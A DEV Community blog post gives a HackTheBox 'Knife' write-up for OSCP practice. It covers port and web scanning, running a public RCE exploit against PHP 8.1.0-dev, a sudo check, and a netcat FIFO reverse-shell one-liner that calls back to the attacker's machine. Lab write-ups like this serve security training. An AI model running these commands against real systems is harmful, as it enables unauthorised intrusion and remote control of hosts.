DEV Community

Cover image for Writeup: HackTheBox Knife - Without Metasploit (OSCP Prep)
Chris 'Huey' S
Chris 'Huey' S

Posted on

Writeup: HackTheBox Knife - Without Metasploit (OSCP Prep)

Hello all, Apologies for the extreme delay. But I decided to take a mini break to get some more understanding of Priv Esc with Windows and Linux.

This week I decided to hit Knife from Hackthebox.

Let's take it away now!

Command:

nmap -sC -sV -T4 -p- -oN nmap.txt 10.10.10.242

Image description

PortOpen:

  1. 22 OpenSSH 8.2p1 Ubuntu
  2. 80 Apache HttpD 2.4.41

First things first, I am going to head over to the website.

Image description

Nothing too interesting here, I clicked around a bit but I was not able to get to any other pages from the landing page.

I am going to run Dirb while I continue to investigate this.

Command:

dirb http://10.10.10.242/ -o Dirb

Image description

The index.php brings up the main landing page again and the server-status brings up an error page.

But one thing we know now but didn't before. We can see that we are dealing with a PHP site.

I am going to try another service to see if we can get any useful information. Let's fire up Nikto, which is a free command-line vuln scanner that scans webservers for dangerous files/CGIs, outdated software and other problems.

Command:

nikto -h 10.10.10.242

Image description

Scrolling down we can see that the header is PHP/8.1.0-Dev.

Let's also run Curl to investigate the site.

Command:

curl http://10.10.10.242 -v

Image description

We can see here that PHP is shown again.

I am going to do some more research on this and head over to Google.

The first entry is for a RCE!

Image description
Image description

Download this and move it into your file path. Run the pwd command to make sure you are moving it to the right location.

Command:

mv /home/huey/Desktop /home/huey/Documents/HTB/Knife/49933.py

Image description

Command:

python3 49933.py

Image description

Command:

sudo -l

We can see that NOPASSWD: /usr/bin/knife, which might have an entry in gtfobins.

Image description

Let's get a better shell first though.

Command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f/|/bin/sh -i 2>&1|nc tun0 1234 >/tmp/f

Image description

Command:

nc -nvlp 1234
python3 -c 'import pty;pty.spawn("/bin/bash")'

Image description

Now head over to Gtfobins and search Knife.

Image description

Image description

Discussion (0)